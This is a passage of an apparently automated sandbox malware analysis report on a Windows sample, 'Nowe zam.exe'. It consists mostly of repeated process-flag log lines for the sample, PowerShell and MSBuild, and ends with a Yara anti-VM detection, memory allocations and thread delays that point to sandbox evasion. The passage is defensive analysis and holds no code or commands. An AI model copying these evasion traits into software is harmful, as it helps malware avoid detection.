Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR

Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 2510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 6BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 7BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 7D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 8D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: A490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory allocated: B490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4C20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599188	Jump to behavior
